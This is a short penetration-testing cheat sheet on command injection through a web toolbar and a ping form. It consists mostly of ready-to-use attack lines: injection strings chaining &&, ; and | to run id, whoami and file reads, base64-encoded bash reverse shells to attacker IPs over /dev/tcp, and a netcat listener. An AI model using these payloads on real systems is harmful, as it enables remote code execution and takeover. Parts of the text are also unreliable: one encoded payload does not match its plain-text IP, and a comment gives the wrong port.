toolbar that allows to run commands on target
[1]If nothing happens, try to inspect element and change the method from “GET” to “POST”
[2] echo a revshell and encode it in base64
echo “bash -i >& /dev/tcp/192.168.101.53/443 0>&1” | base64 > shell.txt
start a netcat listener on kali, port 443
#Inject this string in the toolbar, will decode the base64 encoded revshell on target and trigger a shell on port 442
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xODIuMTY4LjEwMS41My80NDMgMD4mMQo= | base64 -d | bash
[3] Tab that lets you run ping commands
Try using double ampersand to run commands
127.0.0.1 && whoami
127.0.0.1 && cat /etc/host
#Variation: use a semicolon before the command
;id
;whoami
;cat /etc/hosts
#Variation: use | pipe command to get RCE
127.0.0.1 | id
Revshell:
echo "bash -i >&/dev/tcp/192.168.54.200/443 0>&1" | base64 > shell.txt
cat shell.txt
nc -nvlp 443
127.0.0.1 | echo YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguNTQuMjAwLzQ0MyAwPiYxCg== | base64 -d | bash
Last updated